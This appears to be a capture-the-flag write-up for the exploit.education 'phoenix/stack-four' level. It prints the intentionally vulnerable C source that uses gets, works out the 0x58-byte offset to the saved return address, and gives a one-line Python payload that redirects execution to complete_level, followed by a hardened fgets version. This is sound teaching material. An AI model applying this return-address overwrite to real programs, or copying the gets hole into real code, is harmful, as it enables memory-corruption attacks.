1. Intro
2. Code and analysis
2.1. C code
/*
 * phoenix/stack-four, by https://exploit.education
 *
 * The aim is to execute the function complete_level by modifying the
 * saved return address, and pointing it to the complete_level() function.
 *
 * Why were the apple and orange all alone? Because the banana split.
 */
#include <err.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* LEVELNAME is normally supplied by the exploit.education build (-DLEVELNAME);
 * this fallback matches the banner printed by the binary below. */
#ifndef LEVELNAME
#define LEVELNAME "phoenix/stack-four"
#endif

#define BANNER \
  "Welcome to " LEVELNAME ", brought to you by https://exploit.education"

char *gets(char *);

void complete_level() {
  printf("Congratulations, you've finished " LEVELNAME " :-) Well done!\n");
  exit(0);
}

void start_level() {
  char buffer[64];
  void *ret;

  gets(buffer);               /* unbounded read: the level's intended bug */

  ret = __builtin_return_address(0);
  printf("and will be returning to %p\n", ret);
}

int main(int argc, char **argv) {
  printf("%s\n", BANNER);
  start_level();
}
2.2. Analysis
main calls start_level, which reads a line into buffer with gets, prints the saved return address it will return to, and returns; the program then exits.
3. Confirming the vulnerability and preparing the attack
3.1. Vulnerability
gets performs no bounds check, so input longer than the 64-byte buffer overwrites the saved return address of start_level.
3.2. Preparation
As in the previous levels, first find the address of complete_level.
user@phoenix-amd64:/opt/phoenix/amd64$ objdump -d ./stack-four | grep complete_level
000000000040061d <complete_level>:
Next, find the location of the return address relative to start_level's buffer. buffer sits at rbp-0x50, the saved rbp at rbp, and the return address at rbp+8, so the offset from buffer to the return address is 0x50 + 8 = 0x58.
...
0x000000000040063d <+8>: lea -0x50(%rbp),%rax
0x0000000000400641 <+12>: mov %rax,%rdi
0x0000000000400644 <+15>: callq 0x400470 <gets@plt>
...
4. exploit
user@phoenix-amd64:/opt/phoenix/amd64$ (python -c 'print "A"*0x58+"\x1d\x06\x40\x00\x00\x00\x00\x00"') | ./stack-four
Welcome to phoenix/stack-four, brought to you by https://exploit.education
and will be returning to 0x40061d
Congratulations, you've finished phoenix/stack-four :-) Well done!
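The hardened form of start_level's input handling, as an added example that is not part of the original post or the exploit.education source: the unbounded gets is replaced by fgets bounded by sizeof(buffer), and a hypothetical helper safe_read_len feeds a constructed input through it with a sentinel word placed where the saved rbp / return address would be, to confirm that the write can no longer leave the buffer.

```c
#define _POSIX_C_SOURCE 200809L   /* for fmemopen() */
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 64                /* same size as buffer[] in start_level */
#define CANARY   0xdeadbeefcafef00dUL

/* Hardened replacement for the gets() call: fgets() writes at most
 * BUF_SIZE - 1 characters plus a NUL, so no input length can reach the
 * saved rbp or the return address above the buffer. Returns the number of
 * characters stored (newline stripped), or -1 on EOF/error. Input longer
 * than the buffer is truncated; the remainder stays on the stream. */
int read_line(FILE *in, char *buffer) {
    if (fgets(buffer, BUF_SIZE, in) == NULL)
        return -1;
    buffer[strcspn(buffer, "\n")] = '\0';
    return (int)strlen(buffer);
}

/* Test helper (hypothetical, for this example only): feeds a constructed
 * input string through read_line() into a 64-byte buffer that is followed
 * by a sentinel word standing in for the saved rbp / return address.
 * Returns the stored length, -2 if fmemopen() fails, or -3 if the sentinel
 * was clobbered, i.e. if the read escaped the buffer. */
int safe_read_len(const char *input) {
    struct {
        char buffer[BUF_SIZE];
        unsigned long sentinel;
    } frame;
    frame.sentinel = CANARY;
    FILE *f = fmemopen((void *)input, strlen(input), "r");
    if (f == NULL)
        return -2;
    int n = read_line(f, frame.buffer);
    fclose(f);
    return frame.sentinel == CANARY ? n : -3;
}

int main(void) {
    char line[BUF_SIZE];
    int n = read_line(stdin, line);
    printf("stored %d of at most %d characters\n", n, BUF_SIZE - 1);
    return 0;
}
```

Piping the same 0x58-byte payload from the exploit section into this version stores only the first 63 characters and leaves the sentinel untouched.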